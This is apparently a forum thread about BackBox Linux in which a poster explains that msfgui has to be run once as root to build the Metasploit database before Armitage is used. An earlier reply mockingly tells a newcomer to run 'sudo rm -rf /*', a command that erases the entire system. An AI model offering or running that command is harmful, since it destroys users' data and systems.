Do you know how to use sudo ? Start to learn how to use Linux before using pentesting distro and think before you write. Take care about your way to speak with people ...or go away.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

Normally I am all about RTFM; however, I do enjoy this board so I would like to contribute good content.

I know it mentions to run the msfconsole once, but I had to run the GUI before it truly initialize the DB.

You need to run msfgui at least one time for it to build the DB before you fire-up armitage which links to that db.

You obviously will have to run this as sudo/root as it is building and configuring things in the backend.
